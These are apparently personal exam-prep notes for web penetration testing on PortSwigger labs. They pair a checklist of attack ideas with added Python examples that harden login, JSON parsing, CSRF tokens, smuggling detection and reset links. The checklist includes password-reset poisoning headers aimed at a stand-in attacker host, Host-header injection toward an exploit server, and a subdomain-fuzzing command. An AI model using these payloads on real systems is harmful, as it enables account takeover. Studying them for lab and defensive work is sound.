Untitled


Write about what kind of website functions are correlated with certain vulnerabilities. Important page: https://github.com/DingyShark/BurpSuiteCertifiedPractitioner#http-request-smuggling

  1. THE MOST IMPORTANT THINGS TO DO AT START:

    1. I AM NOT HACKING, NOT PWNING. I DO NOT HAVE TO FINISH THIS.
    2. I'm curious about how these things work. I want to understand it!!!
    3. **Check the source code of the pages** (including / comment section, forgot password etc.)
    4. Check how the actions behave ->
      1. Is something affecting the cookie? -> maybe we can use it to escalate privileges. Recently I had a situation where the forgot password utility was changing the username in the cookie, and if I was logged in as a legitimate user I could change the username to administrator.
      2. Is there prototype pollution? Look if we can perform an XSS attack or make the request be rewritten in the search/comment section (use DOM Invader).
      3. Is there cache in the headers? If you see miss/hit we can be sure that there may be something.
      4. Can you enumerate usernames in the forgot password section?
      5. Take a note when you find something but you don't know how to use it - write how it works, what you see.
      6. Is X-Frame-Options set to sameorigin? If not, you can try clickjacking.
      7. Is there a CORS header set up? You can try to exfiltrate data via AJAX/fetch.
    5. Check for XSS, manually in files + use the Burp built-in browser/DOM Invader.
    6. Remember the comments section.
    7. canonical
  2. Perform dir busting and subdomain busting, including GraphQL endpoints.

  3. Check password reset things, then brute-force authentication.

  4. Run Param Miner.

  5. XXE - DNS lookup

App overview

Check what's inside application, play with it.

  • Can you enumerate usernames (more than carlos)?
    • different responses
    • time
    • password reset thing
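The "different responses" and "time" items above are two sides of the same defect in a login or reset handler. The following added example (not from the original notes) shows a handler that leaks username existence through both the message and the skipped hashing work, beside a version that answers every failure identically and does the same work on every path. The user table, salt and `carlos` password are constructed for the demo.

```python
import hashlib
import hmac

# Constructed demo user table (username -> PBKDF2 hash); no real accounts involved.
_SALT = b"constructed-static-salt"
_ITERATIONS = 10_000


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"carlos": _hash("correct-horse")}

# Hash compared against when the username is unknown, so the failure path for an
# unknown user does the same amount of work as the one for a wrong password.
_DUMMY_HASH = _hash("dummy-password")


def login_leaky(username: str, password: str) -> tuple:
    """Vulnerable: a different message per failure cause, and an early return that
    skips the password hashing when the user is unknown, so both the body and the
    response time tell a caller whether the username exists."""
    if username not in USERS:
        return 401, "Invalid username"
    if _hash(password) != USERS[username]:
        return 401, "Incorrect password"
    return 200, "Welcome"


def login_uniform(username: str, password: str) -> tuple:
    """Hardened: one message, one status code and the same hashing work on every
    failure path, so an unknown user is indistinguishable from a wrong password."""
    stored = USERS.get(username, _DUMMY_HASH)
    # compare_digest always runs; the `in` check only matters if a guess happens
    # to match the dummy hash for a non-existent user.
    password_ok = hmac.compare_digest(_hash(password), stored)
    if not (password_ok and username in USERS):
        return 401, "Invalid username or password"
    return 200, "Welcome"


def failure_paths_differ(login) -> bool:
    """True if the handler answers an unknown user and a wrong password differently."""
    return login("no-such-user", "wrong") != login("carlos", "wrong")


if __name__ == "__main__":
    for handler in (login_leaky, login_uniform):
        print(handler.__name__, "distinguishable by body:", failure_paths_differ(handler))
```

When reviewing a real handler, check the same three things the code contrasts: the status code, the body, and whether the expensive step (hashing, mail sending, database lookup) runs on every path.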

First user

  • XSS all locations
  • Dirbusting, register page and other.
  • Forgot password
  • CSRF
  • Request Smuggling
  • Web cache poisoning

dirbusting

Firstly we want to look for hidden files and directories that may contain useful information.

  1. Use raft-small-words - it contains git etc. with extensions like .txt .php .html .js
  2. Test the API for GraphQL [[GraphQL#finding graphql endpoints]]
  3. Use Burp -> Target -> Engagement tools -> Discover Content

subdomains enumeration

```
ffuf -u https://FUZZ.lab.id -w /usr/share/wordlist/seclists/Discovery/DNS/subdomains-top1million-20000.txt
```

auth bypass

  • Host validation bypass via connection state attack [[Authorization bypass]]

sending data

JSON

  • Try to inject more than one parameter with the same name, for example { "userId": 1, "userId": 2 }
  • check if the parameter can be a string or an int
  • check if the parameter can be an object {"userId": {"blabla":1}}
    • if it is an object, check if it's vulnerable to prototype pollution.
  • Try to change Content-Type and send different content
    • `Content-Type: www/x`
  • perform test for race conditions I NNNEEDDD LINNKK HEREEE
  • SQL/NoSQL injection
  • **IF THERE IS roleID TRY USE INTRUDER AND A LOT OF DIFFERENT NUMBERS**
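The duplicate-key, wrong-type and object-instead-of-id checks above all probe how loosely the server parses JSON. As an added example (not part of these notes), the code below shows what Python's default parser does with `{ "userId": 1, "userId": 2 }` and a strict parser that rejects duplicates, unknown keys such as an injected `roleId`, and values of the wrong type. The schema and request bodies are constructed for the demo.

```python
import json
from typing import Any


def parse_lenient(body: str) -> dict:
    """Vulnerable behaviour: json.loads silently keeps the LAST value of a duplicated
    key. A different component in the chain (WAF, front end, another language's
    parser) may keep the FIRST one, so the two disagree about which user is meant."""
    return json.loads(body)


def _reject_duplicates(pairs: list) -> dict:
    """object_pairs_hook: called with the raw (key, value) pairs of every JSON object,
    nested ones included, before they are collapsed into a dict."""
    seen: dict = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate key: {key!r}")
        seen[key] = value
    return seen


def parse_strict(body: str, schema: dict) -> dict:
    """Hardened: no duplicate keys, no keys outside the schema, no missing keys, and
    each value must be exactly the scalar type expected (so an object or a string
    cannot stand in for a numeric id)."""
    data = json.loads(body, object_pairs_hook=_reject_duplicates)
    extra = set(data) - set(schema)
    if extra:
        raise ValueError(f"unexpected keys: {sorted(extra)}")
    for key, expected in schema.items():
        if key not in data:
            raise ValueError(f"missing key: {key!r}")
        value: Any = data[key]
        # bool is a subclass of int in Python; refuse it for int/str fields explicitly.
        if isinstance(value, bool) or not isinstance(value, expected):
            raise ValueError(f"{key!r} must be {expected.__name__}")
    return data


def check(body: str, schema: dict) -> str:
    """Run the strict parser and report 'ok' or the rejection reason."""
    try:
        parse_strict(body, schema)
        return "ok"
    except ValueError as exc:
        return str(exc)


# Constructed schema for a hypothetical "update profile" endpoint.
PROFILE_SCHEMA = {"userId": int, "email": str}

if __name__ == "__main__":
    print(parse_lenient('{"userId": 1, "userId": 2}'))
    for body in ('{"userId": 1, "userId": 2, "email": "a@b"}',
                 '{"userId": {"x": 1}, "email": "a@b"}',
                 '{"userId": 1, "email": "a@b", "roleId": 9}'):
        print(body, "->", check(body, PROFILE_SCHEMA))
```

The `object_pairs_hook` is the only place the standard library lets you see duplicates; once `json.loads` has returned a dict the information is gone.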

POST general

  • check how it reacts to bad characters (use special characters)
  • add additional parameters like another username
  • remove parameters like password etc. and observe the behaviour

```
POST / HTTP/1.1
Host: xyz
Content-Length: ...

csrf=blabla&username=carlos&username=admin&.....
```

CSRF

Where it can be:

  • form submission (csrf token not needed or not tied to session)
  • AJAX (XMLHttpRequest) or fetch can be used when a permissive CORS policy is set up
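The "csrf token not needed or not tied to session" case is worth seeing in code. The added example below (mine, not from the notes) contrasts a token check that only asks "was this token ever issued?" with one that binds the token to the session via an HMAC, so a token obtained from one account is useless for another. Session ids, the key and the endpoint are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Server-side key used to bind tokens to sessions (constructed per process here;
# a real deployment keeps it in configuration so tokens survive restarts).
SECRET_KEY = secrets.token_bytes(32)

# --- Vulnerable pattern: a global pool of valid tokens, not tied to any session ---
_ISSUED = set()


def issue_token_unbound() -> str:
    token = secrets.token_hex(16)
    _ISSUED.add(token)
    return token


def verify_unbound(session_id: str, token: str) -> bool:
    """The session id is ignored: any token that was ever issued (for example one
    obtained from a different account) is accepted for any session."""
    return token in _ISSUED


# --- Hardened pattern: the token is an HMAC over the session id ---------------
def issue_token_bound(session_id: str) -> str:
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_bound(session_id: str, token: str) -> bool:
    """Valid only for the session it was issued to; constant-time comparison."""
    if not token.isascii():  # compare_digest refuses non-ASCII str input
        return False
    return hmac.compare_digest(issue_token_bound(session_id), token)


def change_email(session_id: str, form: dict, verify) -> tuple:
    """Simulated state-changing endpoint; `verify` selects which check is applied."""
    if not verify(session_id, form.get("csrf", "")):
        return 403, "bad csrf token"
    return 200, f"email for {session_id} changed to {form['email']}"


if __name__ == "__main__":
    victim, other = "sess-victim", "sess-other"
    foreign = issue_token_unbound()
    print("unbound check:", change_email(victim, {"csrf": foreign, "email": "x@y"}, verify_unbound))
    print("bound check:  ", change_email(victim, {"csrf": issue_token_bound(other), "email": "x@y"}, verify_bound))
```

A per-session random token stored server-side is the other common way to get the same binding; either way the check must involve the submitting session, not just the token's existence.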

XSS

Location to search

  • search query - remember: USE REPEATER FOR THE SEARCH QUERY IN ORDER NOT TO ENCODE CONTENT
  • login page with autocomplete fields [[Reflected XSS main payloads#credentials steal]]
  • error pages - when we enter a page like /404 and we get the info "/404 not found", it may be vulnerable to XSS; also USE REPEATER
  • DOM elements
  • web cache poisoning
  • request smuggling H2.CL [[Smuggling HTTP 2.0#H2.CL]]

Capture other users requests

  • CSRF (post data)
  • request smuggling
    • cookie steal [[Smuggling HTTP 1.1#cookie steal]]
    • frontend request rewriting [[Smuggling HTTP 1.1#Identyfing frontend request rewriting]]
    • if there is no cache poisoning but some headers are reflected on the page [[Smuggling HTTP 1.1#xss via user agent]]
    • H2 queue poisoning [[Smuggling HTTP 2.0#Response queue poisoning via H2.TE request smuggling]]
    • **REMEMBER THAT SOMETIMES YOU NEED TO FIND AN ENDPOINT OTHER THAN / (/ may not be vulnerable)**
    • Request smuggling urls maybe : /admin /my-account etc, some svg file etc.
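Every smuggling variant linked above depends on a front end forwarding a request whose framing is ambiguous. As an added example from the defender's side (not part of these notes), here is the check a front end or log analyser can run on raw request heads to flag the ambiguities before forwarding: CL and TE together, a Transfer-Encoding other than chunked, disagreeing Content-Length headers, and whitespace smuggled into a header name. The sample requests are constructed.

```python
def framing_problems(raw: bytes) -> list:
    """Return the framing ambiguities found in an HTTP/1.1 request head, or [] if
    the request is unambiguous. A front end should reject (not forward) anything
    that produces a non-empty list."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    problems = []
    content_lengths = []
    transfer_encodings = []
    for line in lines[1:]:  # lines[0] is the request line
        if b":" not in line:
            problems.append(f"malformed header line: {line!r}")
            continue
        name, value = line.split(b":", 1)
        # RFC 7230 forbids whitespace between the field name and the colon; parsers
        # that tolerate it may disagree about which header this line is.
        if name != name.strip():
            problems.append(f"whitespace around header name: {name!r}")
        lname = name.strip().lower()
        value = value.strip()
        if lname == b"content-length":
            if not value.isdigit():
                problems.append(f"non-numeric Content-Length: {value!r}")
            content_lengths.append(value)
        elif lname == b"transfer-encoding":
            transfer_encodings.append(value)
            if value.lower() != b"chunked":
                problems.append(f"non-standard Transfer-Encoding: {value!r}")
    if len(set(content_lengths)) > 1:
        problems.append("conflicting Content-Length values")
    if content_lengths and transfer_encodings:
        problems.append("both Content-Length and Transfer-Encoding present")
    return problems


# Constructed sample request heads for the demo.
SAMPLE_CLEAN = (b"POST /my-account HTTP/1.1\r\nHost: example.test\r\n"
                b"Content-Length: 5\r\n\r\nhello")
SAMPLE_CL_TE = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
                b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n")
SAMPLE_SPACED = b"POST / HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding : chunked\r\n\r\n"
SAMPLE_DOUBLE_CL = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
                    b"Content-Length: 3\r\nContent-Length: 9\r\n\r\n")

if __name__ == "__main__":
    for name, sample in [("clean", SAMPLE_CLEAN), ("cl+te", SAMPLE_CL_TE),
                         ("spaced", SAMPLE_SPACED), ("double-cl", SAMPLE_DOUBLE_CL)]:
        print(f"{name:10} {framing_problems(sample)}")
```

Run over access-log captures of raw requests, a non-empty result is a useful detection signal even when the front end itself tolerates the request.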

Change email

#todo Race condition in changing email or other parameters (single-point race condition)

http request poisoning

in progress

Password Reset

headers

```
X-Forwarded-Host: attackerhost
```

or similar headers:

```
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
```

or

```
X-Forwarded-Scheme: http
X-Forwarded-Host: attackerhost
```

We can use **Param Miner Guess Headers** -> but remember **use it at the password reset page**

  • Host header change:

```
Host: YOUR-LAB-ID.web-security-academy.net:arbitraryport
Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
```

and send

```
GET /?/login'>[…]
```
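All of the header tricks in this section work only because the reset-link generator copies a request-controlled host into the e-mail. The added example below (mine, not from the notes) shows that generator in its vulnerable form next to one that takes the origin from configuration and accepts only an exact allow-listed Host value, so neither `X-Forwarded-Host` nor a port or quote suffix on `Host` changes the link. The hostname and token are constructed.

```python
import secrets
from urllib.parse import urlunsplit

# Public origin of the application, from configuration (constructed for this example).
CANONICAL_SCHEME = "https"
CANONICAL_HOST = "example.test"
ALLOWED_HOSTS = {CANONICAL_HOST, f"{CANONICAL_HOST}:443"}


def reset_link_from_headers(headers: dict, token: str) -> str:
    """Vulnerable: the link is assembled from request-controlled headers, so whoever
    can make the server honour X-Forwarded-Host / X-Forwarded-Scheme (or an odd Host
    value) decides which origin the user's reset token is sent to."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", CANONICAL_HOST)
    scheme = headers.get("X-Forwarded-Scheme", CANONICAL_SCHEME)
    return urlunsplit((scheme, host, "/reset", f"token={token}", ""))


def reset_link_fixed(headers: dict, token: str) -> str:
    """Hardened: forwarding headers are ignored, the Host header must match the
    allow-list exactly (anything after a colon other than :443 is rejected), and
    the origin written into the e-mail comes from configuration only."""
    host = headers.get("Host", "")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"rejected Host header: {host!r}")
    return urlunsplit((CANONICAL_SCHEME, CANONICAL_HOST, "/reset", f"token={token}", ""))


def try_fixed(headers: dict, token: str):
    """Wrapper returning None instead of raising (handy for tests and logging)."""
    try:
        return reset_link_fixed(headers, token)
    except ValueError:
        return None


if __name__ == "__main__":
    token = secrets.token_urlsafe(24)
    poisoned = {"Host": CANONICAL_HOST, "X-Forwarded-Host": "attackerhost"}
    print("vulnerable:", reset_link_from_headers(poisoned, token))
    print("fixed:     ", reset_link_fixed(poisoned, token))
    print("odd port:  ", try_fixed({"Host": f"{CANONICAL_HOST}:arbitraryport"}, token))
```

The exact-match allow-list is deliberate: a check that only compares the part before the first colon would still pass the `host:arbitraryport` and `host:'<a href=...` forms listed above.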

tokens

timestamp

Try to send multiple password reset requests at once. What to do:

  • Grab another session cookie along with a CSRF token
  • For testing, send two POST requests in parallel to get a token for the same user.
  • Check the email
  • POC [[Password reset race condition]]

prototype pollution

Open Burp browser: Proxy -> Intercept -> Open Browser. Open Chrome Dev Tools -> go to DOM Invader -> Reload page

comments about last trials

  • I didn't check the page sources properly
  • I wasn't curious enough about how things work
  • I WASN'T CALM, I WAS AGITATED - THIS IS MAIN REASON WHY I FAILED